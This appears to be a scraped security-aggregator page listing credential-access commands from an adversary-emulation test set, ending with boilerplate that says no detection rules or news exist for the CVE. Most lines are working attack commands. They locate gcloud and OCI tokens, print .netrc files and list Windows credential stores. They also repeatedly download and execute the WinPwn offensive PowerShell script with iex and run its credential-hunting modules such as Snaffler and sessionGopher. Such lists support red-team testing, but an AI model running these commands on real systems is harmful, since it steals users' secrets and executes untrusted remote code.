find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.